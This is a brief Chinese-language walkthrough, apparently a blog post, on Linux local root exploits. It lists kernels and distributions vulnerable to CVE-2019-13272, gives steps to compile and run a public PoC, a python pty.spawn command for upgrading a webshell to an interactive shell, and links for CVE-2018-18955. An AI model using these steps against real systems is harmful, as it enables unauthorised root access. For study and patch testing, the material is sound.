漏洞影響版本(未測試完全)
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
根據GitHub的代碼中所述,作者測試了以下的系統,發現均可成功。
- Ubuntu 16.04.5 kernel 4.15.0-29-generic
- Ubuntu 18.04.1 kernel 4.15.0-20-generic
- Ubuntu 19.04 kernel 5.0.0-15-generic
- Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
- Linux Mint 19 kernel 4.15.0-20-generic
- Xubuntu 16.04.4 kernel 4.13.0-36-generic
- ElementaryOS 0.4.1 4.8.0-52-generic
- Backbox 6 kernel 4.18.0-21-generic
- Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
- Kali kernel 4.19.0-kali5-amd64
- Redcore 1806 (LXQT) kernel 4.16.16-redcore
- MX 18.3 kernel 4.19.37-2~mx17+1
- RHEL 8.0 kernel 4.18.0-80.el8.x86_64
- Debian 9.4.0 kernel 4.9.0-6-amd64
- Debian 10.0.0 kernel 4.19.0-5-amd64
- Devuan 2.0.0 kernel 4.9.0-6-amd64
- SparkyLinux 5.8 kernel 4.19.0-5-amd64
- Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
- Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
- Mageia 6 kernel 4.9.35-desktop-1.mga6
- Antergos 18.7 kernel 4.17.6-1-ARCH
-
首先添加一個用戶 useradd guest;echo 'guest:123456'|chpasswd
然后通過gcc進行編譯 /tmp 目錄下面才有權限-o 輸出poc文件 gcc -s poc.c -o poc
當前用戶再/home/目錄下必須有文件夾
成功
-
參考文獻 https://github.com/bcoles/kernel-exploits/blob/master/CVE-2019-13272/poc.c https://zhuanlan.zhihu.com/p/76231535
再webshell下實現
python -c'import pty;pty.spawn("/bin/sh")'- 然后再執行
-
參考文獻 https://www.cnblogs.com/xdjun/p/7620531.html https://www.cnblogs.com/Rightsec/p/10370132.html
CVE-2018-18955
-
參考文獻 https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-18955/subuid_shell.c https://www.freebuf.com/vuls/197122.html